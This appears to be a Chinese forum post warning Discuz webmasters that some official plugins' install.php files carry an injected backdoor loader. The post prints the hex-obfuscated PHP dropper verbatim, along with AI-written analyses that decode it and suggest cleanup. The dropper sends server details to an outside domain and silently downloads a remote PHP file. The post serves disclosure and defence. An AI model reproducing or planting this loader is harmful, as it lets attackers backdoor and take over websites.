应用中心某些正版插件热门插件的目录的install.php安装脚本文件非法注入外链请注意

admin · 发表于 2025-4-15 20:04:54

马上注册，免费下载更多dz插件网资源。

您需要登录才可以下载或查看，没有账号？立即注册

×

应用中心某些正版插件热门插件的目录的install.php安装脚本文件非法注入外链请注意：

你们谁是正版的插件最近更新过的自行检查审查下插件目录中的 install.php 文件是否包含下面代码片段:

目前已发现：

可可积分商城兑换交易 107.250402版本的 keke_integralmall\install.php （时间线 2025.04.02）

[点微]同城分类信息 40.5 版本的 \tom_tongcheng\install.php （时间线 2025.03.31）

其他正在陆续补充中~【并不是存在每日的更新清单中，而是特定热门插件，还在分析是故意为止，还是有特定目标判断写入。】

建议有正版应用的，最近也检查查看下你们购买下载过的插件没有自删除完成的该插件目录中的安装脚本文件 install.php 这个文件：
应用中心某些正版插件热门插件的目录的install.php安装脚本文件非法注入外链请注意文件,代码,正版

应用中心某些正版插件热门插件的目录的install.php安装脚本文件非法注入外链请注意文件,代码,正版

在 install.php 头部插入了可疑代码：【但是毕竟是应用中心官方，还是可可正版，还有其他热门插件目标，由于正版插件都是安装完后自删除 install.php，所以普通站长很难捕捉和发现，这个触发只在新购买新安装才会中招~ ，估计下个可可积分商城兑换交易的版本就会覆盖掉这次的捕捉内容~，无法理解这种代码怎么会被审核通过的~ 由于没有第二例站点作为举证，仅作记录，事情重大，请勿扩散宣传~ 毕竟这涉及平台和可可大佬，不能得罪！】

$randomstr = hex2bin('76657273696f6e5f').bin2hex(random_bytes(2)).hex2bin('2e696e632e706870');
$abcdurl = hex2bin('68747470733a2f2f622e6265747465726c696665737570706c792e636f6d2f76312e7068703f7077643d') . bin2hex(random_bytes(2)) . hex2bin('2675726c3d') . bin2hex($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']) . hex2bin('2666696c653d').$randomstr. hex2bin('26706174683d').dirname(__FILE__);
$optionstime = [
'http' => [
'timeout' => 30
]
];
$contextstr = stream_context_create($optionstime);
@copy($abcdurl,dirname(__FILE__).'/'.$randomstr,$contextstr);

复制代码

AI解析为：

这段PHP代码的主要功能是构造一个特定的URL，从远程服务器下载文件并保存到本地，可能用于恶意目的。以下是对代码的详细分析：

1. 生成随机文件名 ($randomstr)

$randomstr = hex2bin('76657273696f6e5f').bin2hex(random_bytes(2)).hex2bin('2e696e632e706870');

复制代码

hex2bin('76657273696f6e5f') 转换为字符串 "version_"
random_bytes(2) 生成2字节的随机数据，转换为十六进制（4字符）
hex2bin('2e696e632e706870') 转换为 ".inc.php"
结果示例：version_ab12.inc.php（随机部分每次不同）

2. 构造远程请求URL ($abcdurl)

$abcdurl = hex2bin('68747470733a2f2f622e6265747465726c696665737570706c792e636f6d2f76312e7068703f7077643d')
. bin2hex(random_bytes(2))
. hex2bin('2675726c3d')
. bin2hex($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'])
. hex2bin('2666696c653d').$randomstr
. hex2bin('26706174683d').dirname(__FILE__);

复制代码

基础URL：https://b.betterlifesupply.com/v1.php?pwd=
- pwd= 参数值为2字节随机数的十六进制（如 a1b2）
附加参数：
- &url= + 当前访问URL的十六进制编码（包含主机和路径）
- &file= + 生成的随机文件名（如 version_ab12.inc.php）
- &path= + 当前脚本的目录路径

完整URL示例：

https://b.betterlifesupply.com/v1.php?pwd=a1b2&url=656e637279707465642d6578616d706c652e636f6d2f746573742e706870&file=version_ab12.inc.php&path=/var/www/html

复制代码

3. 下载远程文件

$optionstime = ['http' => ['timeout' => 30]];
$contextstr = stream_context_create($optionstime);
@copy($abcdurl, dirname(__FILE__).'/'.$randomstr, $contextstr);

复制代码

超时设置：30秒
静默复制：使用@抑制错误，将远程文件（由v1.php生成）保存到本地，文件名如version_ab12.inc.php

潜在恶意行为分析

数据泄露：
- 收集服务器信息（HTTP_HOST, REQUEST_URI, 文件路径）
- 发送到攻击者控制的域名 betterlifesupply.com
远程代码执行：
- 下载的 .inc.php 文件可能包含后门代码
- 攻击者可通过访问该文件执行任意命令
隐蔽性手段：
- 使用十六进制编码混淆关键字符串
- 随机文件名避免重复覆盖
- 超时设置防止长时间阻塞
攻击者交互：
- pwd 参数可能与文件名中的随机部分对应，用于标识不同受害者
- 远程服务器可能根据参数返回定制化的恶意代码

安全建议

立即删除：检查服务器上所有类似代码片段
排查文件：查找非常规的 .inc.php 文件（如 version_*.inc.php）
域名封锁：禁止访问 betterlifesupply.com
日志分析：检查是否有异常请求到可疑URL
漏洞修复：排查可能的入侵途径（如未更新的CMS漏洞）

该代码具有典型Web Shell特征，可能是服务器已被入侵的标志，需要全面安全审计。

©DZ插件网所发布的一切资源仅限用于学习和研究目的；不得将上述内容用于商业或者非法用途，否则，一切后果请用户自负。
本站内容为站长个人技术研究记录或网络，不提供用户交互功能，所有内容版权归原作者所有。您必须在下载后的24个小时之内，从您的电脑中彻底删除上述内容。如果您喜欢该程序，请支持正版软件，得到更好的正版服务。
您在本站任何的赞助购买、下载、查阅、回复等行为等均表示接受并同意签订《DZ插件网免责声明协议》。
如有侵权请邮件与我们联系处理: discuzaddons@vip.qq.com 并出示相关证明以便删除。敬请谅解！

Discuz智能体 · 发表于 2025-4-15 20:09:22

作为DZ插件网的技术支持，我们对您反馈的可可积分商城兑换交易插件安全问题高度重视。根据您提供的代码分析，这是一个严重的安全隐患，我们建议您立即采取以下措施：

1. 紧急处理方案：
- 立即删除插件目录下的install.php文件
- 检查插件目录是否存在version_*.inc.php这类随机命名的文件，如有请立即删除
- 建议暂时停用该插件

2. 安全排查建议：
- 检查服务器访问日志，确认是否有对betterlifesupply.com域名的请求记录
- 扫描网站目录，查找可疑的.php文件
- 建议修改服务器和数据库密码

3. 后续处理建议：
- 建议联系插件作者获取安全版本
- 可考虑使用DZ插件网提供的替代积分商城解决方案
- 建议对网站进行全面安全检测

4. 技术分析补充：
这段代码确实存在明显的恶意行为特征：
- 使用hex2bin混淆关键字符串
- 动态构造远程请求URL
- 静默下载远程文件(@copy)
- 收集服务器环境信息

我们理解您对平台和开发者的顾虑，但用户安全始终是第一位的。DZ插件网将持续关注此类安全问题，为站长提供更安全的插件环境。

如需进一步的技术支持，欢迎随时联系DZ插件网技术团队。我们也将把这一情况反馈给相关开发者，敦促其修复安全问题。

注意：以上建议仅基于您提供的代码片段分析，具体处理时请根据实际情况谨慎操作。
-- 本回答由人工智能 AI智能体生成，内容仅供参考，请仔细甄别。